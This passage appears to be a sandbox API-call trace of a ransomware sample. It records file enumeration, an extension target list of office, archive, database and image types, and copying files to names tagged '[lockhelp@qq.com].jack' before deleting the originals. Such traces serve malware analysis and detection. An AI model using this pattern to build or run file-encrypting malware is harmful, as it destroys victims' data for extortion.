cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0196.059] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0196.059] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Extended", cAlternateFileName="")) returned 1 [0196.059] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604978 [0196.059] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.059] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0196.060] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0196.060] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0196.060] FindClose (in: hFindFile=0x604978 | out: hFindFile=0x604978) returned 1 [0196.060] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.060] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0196.060] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604978 [0196.090] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.034] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0197.034] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0197.034] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0197.034] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0197.035] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0197.035] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0197.035] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0197.035] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0197.035] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0197.035] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0197.035] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0197.036] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0197.036] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0197.036] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0197.036] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0197.036] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0197.565] FindClose (in: hFindFile=0x604978 | out: hFindFile=0x604978) returned 1 [0197.803] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0197.803] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x0, dwReserved1=0x240000, cFileName="header.bmp", cAlternateFileName="")) returned 1 Thread: id = 21 os_tid = 0xdbc [0195.722] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3f61230 [0195.722] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3f71238 [0195.723] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x23789e0 [0195.723] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x65aa20 [0195.723] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378a58 [0195.723] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x4331020 [0195.726] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378a70 [0195.726] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378a70, Size=0x20) returned 0x236bcd8 [0195.726] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378a70 [0195.726] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378a70, Size=0x20) returned 0x236b850 [0195.726] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0195.727] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0195.727] Wow64DisableWow64FsRedirection (in: OldValue=0x37dff50 | out: OldValue=0x37dff50*=0x0) returned 1 [0195.727] lstrlenW (lpString="kernel32.dll") returned 12 [0195.727] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236bcd8 | out: hHeap=0x5e0000) returned 1 [0195.727] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0195.727] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b850 | out: hHeap=0x5e0000) returned 1 [0195.727] Sleep (dwMilliseconds=0x64) [0195.925] lstrcmpiW (lpString1=".log", lpString2=".jack") returned 1 [0195.925] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0195.925] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0196.090] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=42674) returned 1 [0196.090] CloseHandle (hObject=0x3ac) returned 1 [0196.090] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 0x20 [0196.091] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.091] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0196.091] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.091] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.091] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0196.091] GetLastError () returned 0x0 [0196.091] ReadFile (in: hFile=0x3ac, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xa6b2, lpOverlapped=0x0) returned 1 [0196.105] WriteFile (in: hFile=0x3d8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xa6c0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xa6c0, lpOverlapped=0x0) returned 1 [0196.108] ReadFile (in: hFile=0x3ac, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.108] WriteFile (in: hFile=0x3d8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x11e, lpOverlapped=0x0) returned 1 [0196.108] SetEndOfFile (hFile=0x3d8) returned 1 [0196.108] CloseHandle (hObject=0x3d8) returned 1 [0196.111] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.111] SetEndOfFile (hFile=0x3ac) returned 1 [0196.113] CloseHandle (hObject=0x3ac) returned 1 [0196.113] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0196.113] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 1 [0196.113] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.113] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.114] lstrlenW (lpString=".doc") returned 4 [0196.114] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0196.114] lstrlenW (lpString=".docx") returned 5 [0196.114] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0196.114] lstrlenW (lpString=".pdf") returned 4 [0196.114] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0196.114] lstrlenW (lpString=".xls") returned 4 [0196.114] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0196.114] lstrlenW (lpString=".xlsx") returned 5 [0196.114] lstrcmpiW (lpString1=".xlsx", lpString2="6.log") returned -1 [0196.114] lstrlenW (lpString=".ppt") returned 4 [0196.114] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0196.114] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.114] lstrlenW (lpString=".zip") returned 4 [0196.114] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0196.114] lstrlenW (lpString=".rar") returned 4 [0196.114] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0196.114] lstrlenW (lpString=".bz2") returned 4 [0196.114] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0196.114] lstrlenW (lpString=".7z") returned 3 [0196.114] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0196.114] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.114] lstrlenW (lpString=".dbf") returned 4 [0196.114] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0196.114] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.114] lstrlenW (lpString=".1cd") returned 4 [0196.114] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0196.114] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.114] lstrlenW (lpString=".jpg") returned 4 [0196.115] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0196.115] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.115] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.115] lstrlenW (lpString=".doc") returned 4 [0196.115] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0196.115] lstrlenW (lpString=".docx") returned 5 [0196.115] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0196.115] lstrlenW (lpString=".pdf") returned 4 [0196.115] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0196.115] lstrlenW (lpString=".xls") returned 4 [0196.115] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0196.115] lstrlenW (lpString=".xlsx") returned 5 [0196.115] lstrcmpiW (lpString1=".xlsx", lpString2="6.log") returned -1 [0196.115] lstrlenW (lpString=".ppt") returned 4 [0196.115] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0196.115] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.115] lstrlenW (lpString=".zip") returned 4 [0196.115] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0196.115] lstrlenW (lpString=".rar") returned 4 [0196.115] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0196.115] lstrlenW (lpString=".bz2") returned 4 [0196.115] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0196.115] lstrlenW (lpString=".7z") returned 3 [0196.115] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0196.115] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.115] lstrlenW (lpString=".dbf") returned 4 [0196.115] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0196.116] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.116] lstrlenW (lpString=".1cd") returned 4 [0196.116] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0196.116] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0196.116] lstrlenW (lpString=".jpg") returned 4 [0196.116] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0196.116] lstrcmpiW (lpString1=".ini", lpString2=".jack") returned -1 [0196.116] lstrlenW (lpString="desktop.ini") returned 11 [0196.116] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0196.116] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=129) returned 1 [0196.116] CloseHandle (hObject=0x3ac) returned 1 [0196.116] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini")) returned 0x26 [0196.117] GetFileAttributesW 